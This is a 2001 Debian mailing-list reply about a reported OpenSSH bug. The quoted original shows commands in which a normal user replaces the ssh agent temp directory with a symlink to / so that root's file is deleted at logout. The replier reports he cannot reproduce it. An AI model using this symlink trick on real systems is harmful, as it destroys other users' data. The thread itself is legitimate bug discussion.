Re: SSH allows deletion of other users files...

To: <debian-user@lists.debian.org>
Subject: Re: SSH allows deletion of other users files...
From: "Leonard Leblanc" <lleblanc@emergeknowledge.com>
Date: Mon, 4 Jun 2001 16:03:51 -0500
Message-id: <[🔎] 001101c0ed39$db9d1ec0$a3aafea9@EMERGEKNOWLEDGE.COM>
References: <Pine.LNX.4.30.0106041118520.1924-100000@shishi.roaringpenguin.com>

 >  [root@clarity /root]# touch /cookies;ls /cookies
> >  /cookies
> >  [root@clarity /root]# ssh zen@localhost
> >  zen@localhost's password:
> >  [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
> >  [zen@clarity zen]$ logout
>
> >  [root@clarity /root]# ls /cookies
> >  /bin/ls: /cookies: No such file or directory
>
> I could not duplicate this with OpenSSH 2.9p1-1 on Red Hat 6.2
>

I could not duplicate this with OpenSSH-1.2.3, protocol version 1.5 on a
Debian box.

Leonard Leblanc,
Webmaster / Intranet Administrator
www.emergeknowledge.com

Reply to:

Follow-Ups:
- Re: SSH allows deletion of other users files...
  - From: Alson van der Meulen <alson@linuxfreak.nl>

Prev by Date: Re: How do I pass init= to the kernel?
Next by Date: Re: small school: replacements for MS Word and Excel
Previous by thread: iso images
Next by thread: Re: SSH allows deletion of other users files...
Index(es):
- Date
- Thread